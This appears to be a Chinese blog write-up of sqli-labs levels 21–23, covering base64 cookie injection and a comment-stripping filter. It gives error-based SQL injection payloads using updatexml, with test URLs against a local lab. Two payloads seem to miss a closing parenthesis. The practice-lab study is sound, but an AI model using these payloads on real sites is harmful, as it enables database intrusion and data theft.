sqli靶场一直没来得及做,趁寒假把它做了,同时巩固下SQL注入
Less-21
Less-21 Cookie Injection- Error Based- complex - string
cookie注入-基于错误-复杂-字符串
测试
登录进去uname的值被加密,以=结尾,首先想到base64
不出意外是base64加密
burp抓包,然后改cookie中的uname再加密就可以
payload
admin') and updatexml(1,concat(0x7e,(select user()),0x7e),1#
源码
设置cookie并使用base64加密
调用cookie中的uname并base64加密,sql语句直接进行查询并返回错误和结果
Less-22
Less-22 Cookie Injection- Error Based- Double Quotes - string
cookie注入-基于错误-双引号-字符串
payload
admin" and updatexml(1,concat(0x7e,(select user()),0x7e),1#
Less-23
Error Based- strip comments
基于错误-有过滤
测试
http://127.0.0.1/sqli/Less-23/?id=1'
http://127.0.0.1/sqli/Less-23/?id=1'#
http://127.0.0.1/sqli/Less-23/?id=1'%23
http://127.0.0.1/sqli/Less-23/?id=1'--+
都多了个',应该是过滤掉了注释符,那直接用引号来闭合
http://127.0.0.1/sqli/Less-23/?id=1' or 1='1
payload:
1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) or 1='1
源码
对注释符进行了替换